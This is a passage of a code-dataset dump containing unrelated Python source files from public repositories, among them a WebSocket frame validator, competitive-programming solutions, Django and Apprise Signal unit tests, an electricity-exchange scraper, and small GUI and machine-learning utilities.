self._get_masked(mask_key)\n\n def _is_invalid_close_status(self, code):\n#should be a static method\n global VALID_CLOSE_STATUS\n\n return code in VALID_CLOSE_STATUS or (3000 <= code < 5000)\n\n def validate(self):\n if self.rsv1 or self.rsv2 or self.rsv3:\n raise WebSocketProtocolException('rsv is not implemented, yet')\n\n if self.opcode not in ABNF.OPCODES:\n raise WebSocketProtocolException('Invalid opcode ' + self.opcode)\n\n if self.opcode == ABNF.OPCODE_PING and not self.fin:\n raise WebSocketProtocolException('Invalid ping frame')\n\n if self.opcode == ABNF.OPCODE_CLOSE:\n l = len(self.data)\n if not l:\n return\n if l == 1 or l >= 126:\n raise WebSocketProtocolException('Invalid close frame')\n if l > 2 and not validate_utf8(self.data[2]):\n raise WebSocketProtocolException('Invalid close frame')\n\n code= 256 * self.data[0] + self.data[1]\n if not self._is_invalid_close_status(code):\n raise WebSocketProtocolException('Invalid close opcode')\n\n def __str__(self):\n return 'fin=' + str(self.fin) + ' opcode=' + str(self.opcode) + ' data=' + str(self.data)\n","repo_name":"gnaggnoyil/okcoin-libinterface","sub_path":"websocket_abnf.py","file_name":"websocket_abnf.py","file_ext":"py","file_size_in_byte":4869,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"72398040693","text":"def func(n):\n counter = 0\n for i in range(n):\n l = list(map(int,input().split()))\n p1 = l[0]\n q1 = l[1]\n if p1 < q1:\n counter += 1\n if counter > 0:\n print('Happy Alex')\n else:\n print('Poor Alex')\nn = int(input())\nfunc(n)","repo_name":"bijeshofficial/coding_solutions","sub_path":"CodeForces/456A.Laptops.py","file_name":"456A.Laptops.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19989799364","text":"class Solution:\n def rotateString(self, A: str, B: str) -> bool:\n if A == \"\":\n if B == \"\":\n return True\n else:\n return False\n for idx in range(len(A)):\n newstr = A[idx+1:]+A[:idx+1]\n if B == newstr:\n return True\n return False\n ","repo_name":"KCbao/Leetcode_Python","sub_path":"String/796.py","file_name":"796.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22276581810","text":"from tkinter import *\nfrom PIL import ImageTk, Image\n\nroot = Tk()\nroot.title(\"Checkboxes\")\n\ndef show():\n my_label = Label(root, text=var.get()) \n my_label.pack()\n\nvar = StringVar()\n\nc = Checkbutton(root, text= \"Click here to Select/Deselect\", variable=var, onvalue=\"Selected\", offvalue=\"Deselected\")\nc.deselect()\nc.pack()\n\nb = Button(root, text=\"Show Status\", command=show).pack()\n\n\nroot.mainloop()","repo_name":"NNikoGG/tkinter-gui","sub_path":"checkboxes.py","file_name":"checkboxes.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23702666397","text":"import logging\nfrom unittest import mock\nfrom unittest.mock import MagicMock\n\nfrom django.urls import reverse\nfrom django.utils import timezone\n\nfrom eth_account import Account\nfrom rest_framework import status\nfrom rest_framework.test import APITestCase\n\nfrom ..clients import CannotGetPrice\nfrom ..services.price_service import PriceService\n\nlogger = logging.getLogger(__name__)\n\n\nclass TestTokenViews(APITestCase):\n ganache_chain_id = 1337\n\n @mock.patch.object(timezone, \"now\", return_value=timezone.now())\n def test_token_price_view(self, timezone_now_mock: MagicMock):\n chain_id = 1\n invalid_address = \"0x1234\"\n response = self.client.get(\n reverse(\n \"v1:tokens:price-usd\",\n args=(\n chain_id,\n invalid_address,\n ),\n )\n )\n self.assertEqual(response.status_code, status.HTTP_422_UNPROCESSABLE_ENTITY)\n self.assertEqual(\n response.json(),\n {\"arguments\": [chain_id], \"code\": 2, \"message\": \"Chain is not supported\"},\n )\n\n chain_id = self.ganache_chain_id\n response = self.client.get(\n reverse(\n \"v1:tokens:price-usd\",\n args=(\n chain_id,\n invalid_address,\n ),\n )\n )\n self.assertEqual(response.status_code, status.HTTP_422_UNPROCESSABLE_ENTITY)\n self.assertEqual(\n response.json(),\n {\n \"arguments\": [invalid_address],\n \"code\": 1,\n \"message\": \"Invalid ethereum address\",\n },\n )\n\n valid_address = Account.create().address\n with mock.patch.object(\n PriceService,\n \"get_token_eth_value_from_oracles\",\n return_value=4815,\n autospec=True,\n ) as get_token_eth_value_from_oracles_mock:\n with mock.patch.object(\n PriceService, \"get_native_coin_usd_price\", return_value=3, autospec=True\n ) as get_native_coin_usd_price_mock:\n response = self.client.get(\n reverse(\n \"v1:tokens:price-usd\",\n args=(\n chain_id,\n valid_address,\n ),\n )\n )\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(\n response.data,\n {\n \"fiat_code\": \"USD\",\n \"fiat_price\": str(\n get_token_eth_value_from_oracles_mock.return_value\n * get_native_coin_usd_price_mock.return_value\n ),\n \"timestamp\": timezone_now_mock.return_value.isoformat().replace(\n \"+00:00\", \"Z\"\n ),\n },\n )\n\n @mock.patch.object(\n PriceService, \"get_native_coin_usd_price\", return_value=321.2, autospec=True\n )\n def test_token_price_view_address_0(\n self, get_native_coin_usd_price_mock: MagicMock\n ):\n chain_id = 1\n token_address = \"0x0000000000000000000000000000000000000000\"\n\n response = self.client.get(\n reverse(\n \"v1:tokens:price-usd\",\n args=(\n chain_id,\n token_address,\n ),\n )\n )\n self.assertEqual(response.status_code, status.HTTP_422_UNPROCESSABLE_ENTITY)\n self.assertEqual(\n response.json(),\n {\"arguments\": [chain_id], \"code\": 2, \"message\": \"Chain is not supported\"},\n )\n\n chain_id = self.ganache_chain_id\n response = self.client.get(\n reverse(\n \"v1:tokens:price-usd\",\n args=(\n chain_id,\n token_address,\n ),\n )\n )\n\n # Native token should be retrieved even if it is not part of the Token table\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.data[\"fiat_code\"], \"USD\")\n self.assertEqual(response.data[\"fiat_price\"], \"321.2\")\n self.assertTrue(response.data[\"timestamp\"])\n\n @mock.patch.object(\n PriceService,\n \"get_token_usd_price\",\n side_effect=CannotGetPrice(),\n )\n def test_token_price_view_error(self, get_token_usd_price_mock: MagicMock):\n chain_id = 1\n token_address = \"0x0000000000000000000000000000000000000000\"\n\n response = self.client.get(\n reverse(\n \"v1:tokens:price-usd\",\n args=(\n chain_id,\n token_address,\n ),\n )\n )\n self.assertEqual(response.status_code, status.HTTP_422_UNPROCESSABLE_ENTITY)\n self.assertEqual(\n response.json(),\n {\"arguments\": [chain_id], \"code\": 2, \"message\": \"Chain is not supported\"},\n )\n\n chain_id = self.ganache_chain_id\n response = self.client.get(\n reverse(\n \"v1:tokens:price-usd\",\n args=(\n chain_id,\n token_address,\n ),\n )\n )\n self.assertEqual(response.status_code, status.HTTP_503_SERVICE_UNAVAILABLE)\n self.assertEqual(response.data[\"message\"], \"Price retrieval failed\")\n self.assertEqual(response.data[\"arguments\"], [token_address])\n","repo_name":"safe-global/safe-price-service","sub_path":"safe_price_service/tokens/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":5685,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"29957085777","text":"\nfrom onnx import onnx_pb\nimport onnx\n\ndef is_topsort(model):\n queue = [model]\n namespace = set()\n while queue:\n next_level = []\n for q in queue:\n # if q is model, push q.graph (GraphProto)\n if isinstance(q, onnx_pb.ModelProto):\n next_level.append(q.graph)\n # if q is model.graph, push q.node.attribute (AttributeProto)\n if isinstance(q, onnx_pb.GraphProto):\n for n in q.initializer:\n namespace.add(n.name)\n for n in q.input:\n namespace.add(n.name)\n for n in q.node:\n for inp in n.input:\n assert inp in namespace\n for out in n.output:\n namespace.add(out)\n for attr in n.attribute:\n next_level.append(attr)\n \n # if q is model.graph.node.attribute, push q.g and q.graphs (GraphProto)\n if isinstance(q, onnx_pb.AttributeProto):\n next_level.append(q.g)\n for n in q.graphs:\n next_level.append(n)\n queue = next_level\n return True\n\ndef repair_model(model):\n return []\n\n#print(is_topsort(onnx.load(r\"C:\\Users\\tomwi\\Documents\\tfhubmodels\\bit-m-r50x1\\model.onnx\")))\n\nprint(is_topsort(onnx.load(r\"C:\\Users\\tomwi\\OneDrive - Microsoft\\ONNX\\onnxconverter-common\\fp16problem\\melgen_fs_opset11_new.onnx\")))","repo_name":"pranavsambyal/Machine-Learning","sub_path":"ml-env/Lib/site-packages/onnxconverter_common/repair.py","file_name":"repair.py","file_ext":"py","file_size_in_byte":1484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9870148397","text":"#!/usr/bin/env python3\n\n# The arrow library is used to handle datetimes consistently with other parsers\nfrom datetime import datetime, timezone\nfrom logging import Logger, getLogger\nfrom typing import Any\n\n# BeautifulSoup is used to parse HTML to get information\nfrom bs4 import BeautifulSoup\nfrom requests import Session\n\nfrom electricitymap.contrib.lib.models.event_lists import (\n ExchangeList,\n ProductionBreakdownList,\n)\nfrom electricitymap.contrib.lib.models.events import ProductionMix\nfrom electricitymap.contrib.lib.types import ZoneKey\n\nSOURCE = \"tso.nbpower.com\"\nEXCHANGE_TO_FLOWS = {\n ZoneKey(\"CA-NB->CA-QC\"): [\"QUEBEC\"],\n # all of these exports are to Maine\n # (see https://www.nbpower.com/en/about-us/our-energy/system-map/),\n # currently this is mapped to ISO-NE\n ZoneKey(\"CA-NB->US-NE-ISNE\"): [\"EMEC\", \"ISO-NE\", \"MPS\"],\n ZoneKey(\"CA-NB->CA-NS\"): [\"NOVA SCOTIA\"],\n ZoneKey(\"CA-NB->CA-PE\"): [\"PEI\"],\n}\n\n\ndef _get_new_brunswick_flows(requests_obj):\n \"\"\"\n Gets current electricity flows in and out of New Brunswick.\n\n There is no reported data timestamp in the page.\n The page returns current time and says \"Times at which values are sampled may vary by as much as 5 minutes.\"\n \"\"\"\n\n url = \"https://tso.nbpower.com/Public/en/SystemInformation_realtime.asp\"\n response = requests_obj.get(url)\n\n soup = BeautifulSoup(response.text, \"html.parser\")\n\n table = soup.find(\"table\", attrs={\"bordercolor\": \"#191970\"})\n\n rows = table.find_all(\"tr\")\n\n headers = rows[1].find_all(\"td\")\n values = rows[2].find_all(\"td\")\n\n flows = {\n headers[i].text.strip(): float(row.text.strip()) for i, row in enumerate(values)\n }\n\n return flows\n\n\ndef fetch_production(\n zone_key: ZoneKey = ZoneKey(\"CA-NB\"),\n session: Session | None = None,\n target_datetime: datetime | None = None,\n logger: Logger = getLogger(__name__),\n) -> list[dict[str, Any]]:\n \"\"\"Requests the last known production mix (in MW) of a given country.\"\"\"\n\n \"\"\"\n In this case, we are calculating the amount of electricity generated\n in New Brunswick, versus imported and exported elsewhere.\n \"\"\"\n\n if target_datetime:\n raise NotImplementedError(\"This parser is not yet able to parse past dates\")\n\n requests_obj = session or Session()\n flows = _get_new_brunswick_flows(requests_obj)\n\n # nb_flows['NB Demand'] is the use of electricity in NB\n # 'EMEC', 'ISO-NE', 'MPS', 'NOVA SCOTIA', 'PEI', and 'QUEBEC'\n # are exchanges - positive for exports, negative for imports\n # Electricity generated in NB is then 'NB Demand' plus all the others\n\n generated = (\n flows[\"NB Demand\"]\n + flows[\"EMEC\"]\n + flows[\"ISO-NE\"]\n + flows[\"MPS\"]\n + flows[\"NOVA SCOTIA\"]\n + flows[\"PEI\"]\n + flows[\"QUEBEC\"]\n )\n production = ProductionBreakdownList(logger)\n production.append(\n zoneKey=zone_key,\n # Using the current utc time because the page returns the current time.\n datetime=datetime.now(tz=timezone.utc).replace(\n minute=0, second=0, microsecond=0\n ),\n source=SOURCE,\n production=ProductionMix(\n unknown=generated,\n ),\n )\n\n return production.to_list()\n\n\ndef fetch_exchange(\n zone_key1: ZoneKey,\n zone_key2: ZoneKey,\n session: Session | None = None,\n target_datetime: datetime | None = None,\n logger: Logger = getLogger(__name__),\n) -> list[dict[str, Any]]:\n \"\"\"Requests the last known power exchange (in MW) between two regions.\"\"\"\n if target_datetime:\n raise NotImplementedError(\"This parser is not yet able to parse past dates\")\n\n sorted_zone_keys = \"->\".join(sorted([zone_key1, zone_key2]))\n\n requests_obj = session or Session()\n flows = _get_new_brunswick_flows(requests_obj)\n\n # In this source, positive values are exports and negative are imports.\n # In expected result, \"net\" represents an export.\n # So these can be used directly.\n\n if sorted_zone_keys not in EXCHANGE_TO_FLOWS:\n raise NotImplementedError(\"This exchange pair is not implemented\")\n exchanges = ExchangeList(logger)\n exchanges.append(\n zoneKey=sorted_zone_keys,\n datetime=datetime.now(tz=timezone.utc).replace(\n minute=0, second=0, microsecond=0\n ),\n source=SOURCE,\n netFlow=sum([flows[flow] for flow in EXCHANGE_TO_FLOWS[sorted_zone_keys]]),\n )\n\n return exchanges.to_list()\n\n\nif __name__ == \"__main__\":\n \"\"\"Main method, never used by the Electricity Map backend, but handy for testing.\"\"\"\n\n print(\"fetch_production() ->\")\n print(fetch_production())\n\n print('fetch_exchange(\"CA-NB\", \"CA-PE\") ->')\n print(fetch_exchange(ZoneKey(\"CA-NB\"), ZoneKey(\"CA-PE\")))\n","repo_name":"electricitymaps/electricitymaps-contrib","sub_path":"parsers/CA_NB.py","file_name":"CA_NB.py","file_ext":"py","file_size_in_byte":4761,"program_lang":"python","lang":"en","doc_type":"code","stars":3126,"dataset":"github-code","pt":"21"} +{"seq_id":"74363590772","text":"import requests\nimport json\n\nurl = 'https://54qhf521ze.execute-api.eu-north-1.amazonaws.com/weather/stockholm'\n\ntry:\n response = requests.get(url)\n response.raise_for_status() # Raise an exception if the request was not successful\n response_dictionary = json.loads(response.text)\n print(response_dictionary)\nexcept requests.exceptions.RequestException as e:\n print(\"An error occurred:\", e)\nexcept json.JSONDecodeError as e:\n print(\"JSON decoding error:\", e)\n","repo_name":"unikhex/devops-23","sub_path":"lektion 7/api_demo.py","file_name":"api_demo.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15224819447","text":"import os\nfrom json import loads\nfrom unittest import mock\nfrom inspect import cleandoc\n\nimport pytest\nimport requests\nfrom apprise import Apprise\nfrom apprise.plugins.NotifySignalAPI import NotifySignalAPI\nfrom helpers import AppriseURLTester\nfrom apprise import AppriseAttachment\nfrom apprise import NotifyType\nfrom apprise.config.ConfigBase import ConfigBase\n\n# Disable logging for a cleaner testing output\nimport logging\nlogging.disable(logging.CRITICAL)\n\n# Attachment Directory\nTEST_VAR_DIR = os.path.join(os.path.dirname(__file__), 'var')\n\n\n@pytest.fixture\ndef request_mock(mocker):\n \"\"\"\n Prepare requests mock.\n \"\"\"\n mock_post = mocker.patch(\"requests.post\")\n mock_post.return_value = requests.Request()\n mock_post.return_value.status_code = requests.codes.ok\n mock_post.return_value.content = \"\"\n return mock_post\n\n\n# Our Testing URLs\napprise_url_tests = (\n ('signal://', {\n # No host specified\n 'instance': TypeError,\n }),\n ('signal://:@/', {\n # invalid host\n 'instance': TypeError,\n }),\n ('signal://localhost', {\n # Just a host provided\n 'instance': TypeError,\n }),\n ('signal://localhost', {\n # key and secret provided and from but invalid from no\n 'instance': TypeError,\n }),\n ('signal://localhost/123', {\n # invalid from phone\n 'instance': TypeError,\n\n }),\n ('signal://localhost/{}/123/'.format('1' * 11), {\n # invalid 'to' phone number\n 'instance': NotifySignalAPI,\n # Notify will fail because it couldn't send to anyone\n 'response': False,\n # Our expected url(privacy=True) startswith() response:\n 'privacy_url': 'signal://localhost/+{}/123'.format('1' * 11),\n }),\n ('signal://localhost:8080/{}/'.format('1' * 11), {\n # one phone number will notify ourselves\n 'instance': NotifySignalAPI,\n }),\n\n ('signal://localhost:8082/+{}/@group.abcd/'.format('2' * 11), {\n # a valid group\n 'instance': NotifySignalAPI,\n # Our expected url(privacy=True) startswith() response:\n 'privacy_url': 'signal://localhost:8082/+{}/@abcd'.format('2' * 11),\n }),\n ('signal://localhost:8080/+{}/group.abcd/'.format('1' * 11), {\n # another valid group (without @ symbol)\n 'instance': NotifySignalAPI,\n # Our expected url(privacy=True) startswith() response:\n 'privacy_url': 'signal://localhost:8080/+{}/@abcd'.format('1' * 11),\n }),\n ('signal://localhost:8080/?from={}&to={},{}'.format(\n '1' * 11, '2' * 11, '3' * 11), {\n # use get args to acomplish the same thing\n 'instance': NotifySignalAPI,\n }),\n ('signal://localhost:8080/?from={}&to={},{},{}'.format(\n '1' * 11, '2' * 11, '3' * 11, '5' * 3), {\n # 2 good targets and one invalid one\n 'instance': NotifySignalAPI,\n }),\n ('signal://localhost:8080/{}/{}/?from={}'.format(\n '1' * 11, '2' * 11, '3' * 11), {\n # If we have from= specified, then all elements take on the to= value\n 'instance': NotifySignalAPI,\n }),\n ('signals://user@localhost/{}/{}'.format('1' * 11, '3' * 11), {\n # use get args to acomplish the same thing (use source instead of from)\n 'instance': NotifySignalAPI,\n }),\n ('signals://user:password@localhost/{}/{}'.format('1' * 11, '3' * 11), {\n # use get args to acomplish the same thing (use source instead of from)\n 'instance': NotifySignalAPI,\n }),\n ('signals://user:password@localhost/{}/{}'.format('1' * 11, '3' * 11), {\n 'instance': NotifySignalAPI,\n # Test that a 201 response code is still accepted\n 'requests_response_code': 201,\n }),\n ('signals://localhost/{}/{}/{}?batch=True'.format(\n '1' * 11, '3' * 11, '4' * 11), {\n # test batch mode\n 'instance': NotifySignalAPI,\n }),\n ('signals://localhost/{}/{}/{}?status=True'.format(\n '1' * 11, '3' * 11, '4' * 11), {\n # test status switch\n 'instance': NotifySignalAPI,\n }),\n ('signal://localhost/{}/{}'.format('1' * 11, '4' * 11), {\n 'instance': NotifySignalAPI,\n # throw a bizzare code forcing us to fail to look it up\n 'response': False,\n 'requests_response_code': 999,\n }),\n ('signal://localhost/{}/{}'.format('1' * 11, '4' * 11), {\n 'instance': NotifySignalAPI,\n # Throws a series of connection and transfer exceptions when this flag\n # is set and tests that we gracfully handle them\n 'test_requests_exceptions': True,\n }),\n)\n\n\ndef test_plugin_signal_urls():\n \"\"\"\n NotifySignalAPI() Apprise URLs\n\n \"\"\"\n\n # Run our general tests\n AppriseURLTester(tests=apprise_url_tests).run_all()\n\n\ndef test_plugin_signal_edge_cases(request_mock):\n \"\"\"\n NotifySignalAPI() Edge Cases\n\n \"\"\"\n # Initialize some generic (but valid) tokens\n source = '+1 (555) 123-3456'\n target = '+1 (555) 987-5432'\n body = \"test body\"\n title = \"My Title\"\n\n # No apikey specified\n with pytest.raises(TypeError):\n NotifySignalAPI(source=None)\n\n aobj = Apprise()\n assert aobj.add(\"signals://localhost:231/{}/{}\".format(source, target))\n assert aobj.notify(title=title, body=body)\n\n assert request_mock.call_count == 1\n\n details = request_mock.call_args_list[0]\n assert details[0][0] == 'https://localhost:231/v2/send'\n payload = loads(details[1]['data'])\n assert payload['message'] == 'My Title\\r\\ntest body'\n\n # Reset our mock object\n request_mock.reset_mock()\n\n aobj = Apprise()\n assert aobj.add(\n \"signals://user@localhost:231/{}/{}?status=True\".format(\n source, target))\n assert aobj.notify(title=title, body=body)\n\n assert request_mock.call_count == 1\n\n details = request_mock.call_args_list[0]\n assert details[0][0] == 'https://localhost:231/v2/send'\n payload = loads(details[1]['data'])\n # Status flag is set\n assert payload['message'] == '[i] My Title\\r\\ntest body'\n\n\ndef test_plugin_signal_yaml_config(request_mock):\n \"\"\"\n NotifySignalAPI() YAML Configuration\n \"\"\"\n\n # Load our configuration\n result, config = ConfigBase.config_parse_yaml(cleandoc(\"\"\"\n urls:\n - signal://signal:8080/+1234567890:\n - to: +0987654321\n tag: signal\n \"\"\"))\n\n # Verify we loaded correctly\n assert isinstance(result, list)\n assert len(result) == 1\n assert len(result[0].tags) == 1\n assert 'signal' in result[0].tags\n\n # Let's get our plugin\n plugin = result[0]\n assert len(plugin.targets) == 1\n assert '+1234567890' == plugin.source\n assert '+0987654321' in plugin.targets\n\n #\n # Test another way to get the same results\n #\n\n # Load our configuration\n result, config = ConfigBase.config_parse_yaml(cleandoc(\"\"\"\n urls:\n - signal://signal:8080/+1234567890/+0987654321:\n - tag: signal\n \"\"\"))\n\n # Verify we loaded correctly\n assert isinstance(result, list)\n assert len(result) == 1\n assert len(result[0].tags) == 1\n assert 'signal' in result[0].tags\n\n # Let's get our plugin\n plugin = result[0]\n assert len(plugin.targets) == 1\n assert '+1234567890' == plugin.source\n assert '+0987654321' in plugin.targets\n\n\ndef test_plugin_signal_based_on_feedback(request_mock):\n \"\"\"\n NotifySignalAPI() User Feedback Test\n\n \"\"\"\n body = \"test body\"\n title = \"My Title\"\n\n aobj = Apprise()\n aobj.add(\n 'signal://10.0.0.112:8080/+12512222222/+12513333333/'\n '12514444444?batch=yes')\n\n assert aobj.notify(title=title, body=body)\n\n # If a batch, there is only 1 post\n assert request_mock.call_count == 1\n\n details = request_mock.call_args_list[0]\n assert details[0][0] == 'http://10.0.0.112:8080/v2/send'\n payload = loads(details[1]['data'])\n assert payload['message'] == 'My Title\\r\\ntest body'\n assert payload['number'] == \"+12512222222\"\n assert len(payload['recipients']) == 2\n assert \"+12513333333\" in payload['recipients']\n # The + is appended\n assert \"+12514444444\" in payload['recipients']\n\n # Reset our test and turn batch mode off\n request_mock.reset_mock()\n\n aobj = Apprise()\n aobj.add(\n 'signal://10.0.0.112:8080/+12512222222/+12513333333/'\n '12514444444?batch=no')\n\n assert aobj.notify(title=title, body=body)\n\n # If a batch, there is only 1 post\n assert request_mock.call_count == 2\n\n details = request_mock.call_args_list[0]\n assert details[0][0] == 'http://10.0.0.112:8080/v2/send'\n payload = loads(details[1]['data'])\n assert payload['message'] == 'My Title\\r\\ntest body'\n assert payload['number'] == \"+12512222222\"\n assert len(payload['recipients']) == 1\n assert \"+12513333333\" in payload['recipients']\n\n details = request_mock.call_args_list[1]\n assert details[0][0] == 'http://10.0.0.112:8080/v2/send'\n payload = loads(details[1]['data'])\n assert payload['message'] == 'My Title\\r\\ntest body'\n assert payload['number'] == \"+12512222222\"\n assert len(payload['recipients']) == 1\n\n # The + is appended\n assert \"+12514444444\" in payload['recipients']\n\n request_mock.reset_mock()\n\n # Test group names\n aobj = Apprise()\n aobj.add(\n 'signal://10.0.0.112:8080/+12513333333/@group1/@group2/'\n '12514444444?batch=yes')\n\n assert aobj.notify(title=title, body=body)\n\n # If a batch, there is only 1 post\n assert request_mock.call_count == 1\n\n details = request_mock.call_args_list[0]\n assert details[0][0] == 'http://10.0.0.112:8080/v2/send'\n payload = loads(details[1]['data'])\n assert payload['message'] == 'My Title\\r\\ntest body'\n assert payload['number'] == \"+12513333333\"\n assert len(payload['recipients']) == 3\n assert \"+12514444444\" in payload['recipients']\n # our groups\n assert \"group.group1\" in payload['recipients']\n assert \"group.group2\" in payload['recipients']\n # Groups are stored properly\n assert '/@group1' in aobj[0].url()\n assert '/@group2' in aobj[0].url()\n # Our target phone number is also in the path\n assert '/+12514444444' in aobj[0].url()\n\n\ndef test_notify_signal_plugin_attachments(request_mock):\n \"\"\"\n NotifySignalAPI() Attachments\n\n \"\"\"\n\n obj = Apprise.instantiate(\n 'signal://10.0.0.112:8080/+12512222222/+12513333333/'\n '12514444444?batch=no')\n assert isinstance(obj, NotifySignalAPI)\n\n # Test Valid Attachment\n path = os.path.join(TEST_VAR_DIR, 'apprise-test.gif')\n attach = AppriseAttachment(path)\n assert obj.notify(\n body='body', title='title', notify_type=NotifyType.INFO,\n attach=attach) is True\n\n # Test invalid attachment\n path = os.path.join(TEST_VAR_DIR, '/invalid/path/to/an/invalid/file.jpg')\n assert obj.notify(\n body='body', title='title', notify_type=NotifyType.INFO,\n attach=path) is False\n\n # Test Valid Attachment (load 3)\n path = (\n os.path.join(TEST_VAR_DIR, 'apprise-test.gif'),\n os.path.join(TEST_VAR_DIR, 'apprise-test.gif'),\n os.path.join(TEST_VAR_DIR, 'apprise-test.gif'),\n )\n attach = AppriseAttachment(path)\n\n # Return our good configuration\n with mock.patch('builtins.open', side_effect=OSError()):\n # We can't send the message we can't open the attachment for reading\n assert obj.notify(\n body='body', title='title', notify_type=NotifyType.INFO,\n attach=attach) is False\n\n # test the handling of our batch modes\n obj = Apprise.instantiate(\n 'signal://10.0.0.112:8080/+12512222222/+12513333333/'\n '12514444444?batch=yes')\n assert isinstance(obj, NotifySignalAPI)\n\n # Now send an attachment normally without issues\n request_mock.reset_mock()\n assert obj.notify(\n body='body', title='title', notify_type=NotifyType.INFO,\n attach=attach) is True\n assert request_mock.call_count == 1\n","repo_name":"caronc/apprise","sub_path":"test/test_plugin_signal.py","file_name":"test_plugin_signal.py","file_ext":"py","file_size_in_byte":11924,"program_lang":"python","lang":"en","doc_type":"code","stars":8936,"dataset":"github-code","pt":"21"} +{"seq_id":"34025253477","text":"import numpy as np\nfrom numpy import linalg as LA\n\nfrom trlib.algorithms.optimization.gradient import gradient\n\n\ndef quasi_newton(Qfunction, state, a0, epsilon, maxiterations):\n\n ak = np.array(a0)\n counter = 0\n error = 1e300\n\n grad = gradient(Qfunction, state, a0)\n H = np.array(np.eye(len(a0)))\n\n while np.any(np.linalg.eigvals(H) > 0): # we look for a local maximum\n\n while error > epsilon and counter < maxiterations:\n counter += 1\n d = H.dot(grad)\n alpha = 1\n ak_prec = ak\n grad_prec = grad\n\n ak = ak + alpha * d\n grad = gradient(Qfunction, state, ak)\n\n error = LA.norm(grad)\n\n delta = ak - ak_prec\n gamma = grad - grad_prec\n delta_t = np.array(delta)[np.newaxis]\n gamma_t = np.array(gamma)[np.newaxis]\n\n H = H + ((1 + gamma * H * gamma_t) / (delta * gamma_t)) * (delta_t * delta) / (delta * gamma_t) - (\n (H * gamma_t * delta) + (delta_t * gamma * H)) / (delta * gamma_t)\n\n test = np.linalg.eigvals(H)\n\n return ak\n","repo_name":"albertometelli/pfqi","sub_path":"trlib/algorithms/optimization/quasi_newton.py","file_name":"quasi_newton.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"36522574332","text":"import torch\n\nclass PhoBertDataset(torch.utils.data.Dataset):\n def __init__(self, first_questions, second_questions, targets, tokenizer, config):\n self.first_questions = first_questions\n self.second_questions = second_questions\n self.targets = targets\n self.tokenizer = tokenizer\n self.length = len(first_questions)\n self.config = config\n\n def __len__(self):\n return self.length\n\n def __getitem__(self, index):\n first_questions = str(self.first_questions[index])\n second_questions = str(self.second_questions[index])\n\n # Remove extra white spaces from questions\n first_questions = \" \".join(first_questions.split())\n second_questions = \" \".join(second_questions.split())\n\n inputs = self.tokenizer.encode_plus(\n first_questions,\n second_questions,\n add_special_tokens=True,\n padding='max_length',\n max_length=2 * self.config['MAX_LEN'] + 3, # max length o 2 questions and 3 spectial tokens\n truncation=True\n )\n\n # Return targets 0, when using dataset in testing and targets are none\n return {\n \"ids\": torch.tensor(inputs[\"input_ids\"], dtype=torch.long),\n \"mask\": torch.tensor(inputs[\"attention_mask\"], dtype=torch.long),\n \"token_type_ids\": torch.tensor(inputs[\"token_type_ids\"], dtype=torch.long),\n \"targets\": torch.tensor(int(self.targets[index]), dtype=torch.long) if self.targets is not None else 0\n }\n","repo_name":"nducthang/Question-Similarity-in-Medical","sub_path":"src/PhoBert/PhoBertDataset.py","file_name":"PhoBertDataset.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"11318921018","text":"\"\"\"\n\nVocabulary.py\nThis file contains the functions for the Vocabulary page.\n- Show the vocabulary words in the list widget\n- Show a new window to show the Thai definition of the English word\n- Add the English word to the database\n- Delete the English word from the database\n- Add the English word to the favourite list\n\n\"\"\"\n\nfrom PyQt5.QtWidgets import QWidget, QLineEdit, QListWidget, QListWidgetItem, QPushButton, QDialog, QLabel, QDialogButtonBox, QMessageBox\nfrom ui.pages.Vocabulary_page_ui import Ui_Form\nfrom ui.pages.Modify_dialog_ui import Ui_Dialog\nfrom PyQt5.QtGui import QFont\nfrom PyQt5.QtSql import QSqlDatabase, QSqlQuery\nfrom PyQt5.QtWidgets import QHBoxLayout, QAbstractItemView, QMenu, QAction\nimport sqlite3\nfrom PyQt5.QtCore import Qt, QSize\nimport os\nimport sys\n\nclass Modify_dialog(QDialog):\n def __init__(self, parent=None):\n super(Modify_dialog, self).__init__(parent)\n self.ui = Ui_Dialog()\n self.ui.setupUi(self)\n\n #if click the checkbox will be enable too\n self.ui.listWidget.itemClicked.connect(self.enable_checkbox)\n\n def enable_checkbox(self, item):\n if item.checkState() == Qt.Checked:\n item.setCheckState(Qt.Unchecked)\n else:\n item.setCheckState(Qt.Checked)\n \n \n\nclass Vocabulary(QWidget):\n def __init__(self):\n super(Vocabulary, self).__init__()\n self.ui = Ui_Form()\n self.ui.setupUi(self)\n\n #Add search box\n self.ui.lineEdit.textChanged.connect(self.search)\n self.ui.listWidget.itemDoubleClicked.connect(self.show_dialog)\n\n\n def showEvent(self, event):\n self.ui.listWidget.clear()\n # Connect to the SQLite database\n # Connect to the SQLite database\n self.db = QSqlDatabase.addDatabase(\"QSQLITE\")\n db_name = \"data.db\"\n db_path = os.path.join(os.path.expanduser(\"~\"), db_name)\n print(db_path)\n \n if not os.path.exists(db_path):\n print(f\"Database file {db_path} does not exist\")\n return\n else:\n print(\"Connected to database\")\n \n self.db.setDatabaseName(db_path)\n\n # Open the database connection\n if not self.db.open():\n print(\"Failed to open database\")\n return\n else:\n print(\"Database opened successfully\")\n\n query = QSqlQuery()\n #Choose the vocab by filtering to show only one word vocab\n query.prepare(\"SELECT DISTINCT body from translation\")\n query.exec_()\n\n while query.next():\n english_word = query.value(0)\n 